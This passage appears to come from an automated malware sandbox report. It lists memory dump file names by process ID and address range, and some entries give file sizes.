                                                                                                        • memory/5940-353-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5944-235-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5968-281-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5988-282-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5988-297-0x0000000003610000-0x0000000003620000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/5988-291-0x0000000003470000-0x0000000003480000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/6080-239-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/6080-236-0x0000000000000000-mapping.dmp
                                                                                                        • memory/6080-240-0x00000000006B0000-0x00000000006C2000-memory.dmp
                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/6100-285-0x0000000000000000-mapping.dmp
                                                                                                        • memory/6100-288-0x00000000005E0000-0x00000000005ED000-memory.dmp
                                                                                                          Filesize

                                                                                                          52KB

                                                                                                        • memory/6116-345-0x0000000000000000-mapping.dmp
                                                                                                        • memory/6124-316-0x0000000000000000-mapping.dmp
                                                                                                        • memory/6132-242-0x0000000000000000-mapping.dmp